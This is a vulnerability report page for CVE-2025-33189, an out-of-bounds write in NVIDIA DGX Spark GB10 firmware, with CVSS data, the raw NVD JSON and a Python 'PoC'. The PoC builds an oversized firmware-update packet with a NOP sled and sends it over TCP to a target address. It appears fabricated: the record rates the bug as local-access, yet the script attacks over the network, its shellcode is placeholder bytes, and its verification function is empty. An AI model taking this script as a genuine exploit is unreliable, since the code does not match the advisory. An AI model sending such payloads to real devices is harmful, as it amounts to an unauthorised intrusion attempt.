Security Vulnerability Report
中文
CVE-2025-33189 CVSS 7.8 HIGH

CVE-2025-33189

Published: 2025-11-25 18:15:50
Last Modified: 2025-12-02 18:19:52
Source: [email protected]

Description

NVIDIA DGX Spark GB10 contains a vulnerability in SROOT firmware, where an attacker could cause an out-of-bound write. A successful exploit of this vulnerability might lead to code execution, data tampering, denial of service, information disclosure, or escalation of privileges.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:nvidia:dgx_os:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:nvidia:dgx_spark:-:*:*:*:*:*:*:* - NOT VULNERABLE
NVIDIA DGX Spark GB10 固件版本 < 修复版本
具体受影响版本需参考NVIDIA官方安全公告

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-33189 PoC - NVIDIA DGX Spark GB10 SROOT Firmware Out-of-Bounds Write # This PoC demonstrates the vulnerability pattern (for authorized security testing only) import struct import socket def create_malicious_payload(): """ Create a malicious payload to trigger out-of-bounds write in SROOT firmware The vulnerability exists in SROOT firmware's boundary check mechanism """ # Firmware update header structure header = bytearray(64) # Magic number for SROOT firmware header[0:4] = b'SRFT' # Firmware version struct.pack_into('<I', header, 4, 0x00010001) # Payload size - exceeds expected boundary # This triggers the out-of-bounds write vulnerability struct.pack_into('<I', header, 8, 0x00010000) # Command type: FIRMWARE_UPDATE struct.pack_into('<I', header, 12, 0x00000001) # Create malicious payload with oversized data payload_size = 0x00010000 # 64KB - triggers boundary overflow payload = bytearray(payload_size) # Fill payload with NOP sled for code injection for i in range(len(payload)): payload[i] = 0x90 # NOP instruction # Add shellcode at the end of payload shellcode_offset = payload_size - 256 shellcode = b'\x90' * 100 + b'\xcc' * 50 # Breakpoint for testing payload[shellcode_offset:shellcode_offset + len(shellcode)] = shellcode # Append payload to header exploit_data = header + payload return exploit_data def send_exploit(target_ip, target_port=5000): """ Send the exploit payload to target device """ payload = create_malicious_payload() try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target_ip, target_port)) sock.send(payload) print(f"[+] Exploit payload sent ({len(payload)} bytes)") response = sock.recv(1024) print(f"[*] Response: {response.hex()}") sock.close() return True except Exception as e: print(f"[-] Error: {e}") return False def verify_vulnerability(): """ Verify if the target is vulnerable """ # Check SROOT firmware version via diagnostic interface diagnostic_cmd = b'\x00\x00\x00\x0aVERSION_QUERY' # Implementation depends on specific device interface # This is a conceptual demonstration pass if __name__ == "__main__": print("CVE-2025-33189 PoC - NVIDIA DGX Spark GB10 SROOT OOB Write") print("=" * 60) print("[!] Warning: This tool is for authorized security testing only") print() # Example usage target_ip = "192.168.1.100" # Target DGX Spark IP send_exploit(target_ip)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-33189", "sourceIdentifier": "[email protected]", "published": "2025-11-25T18:15:50.340", "lastModified": "2025-12-02T18:19:51.703", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA DGX Spark GB10 contains a vulnerability in SROOT firmware, where an attacker could cause an out-of-bound write. A successful exploit of this vulnerability might lead to code execution, data tampering, denial of service, information disclosure, or escalation of privileges."}, {"lang": "es", "value": "NVIDIA DGX Spark GB10 contiene una vulnerabilidad en el firmware SROOT, donde un atacante podría causar una escritura fuera de límites. Un exploit exitoso de esta vulnerabilidad podría conducir a la ejecución de código, manipulación de datos, denegación de servicio, revelación de información o escalada de privilegios."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:nvidia:dgx_os:-:*:*:*:*:*:*:*", "matchCriteriaId": "40EF912C-72C4-4758-9157-169CE92B33C5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:dgx_spark:-:*:*:*:*:*:*:*", "matchCriteriaId": "76975E53-4E5C-4C6D-85D9-EE2879F960DF"}]}]}], "references": [{"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33189", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5720", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cve.org/CVERecord?id=CVE-2025-33189", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.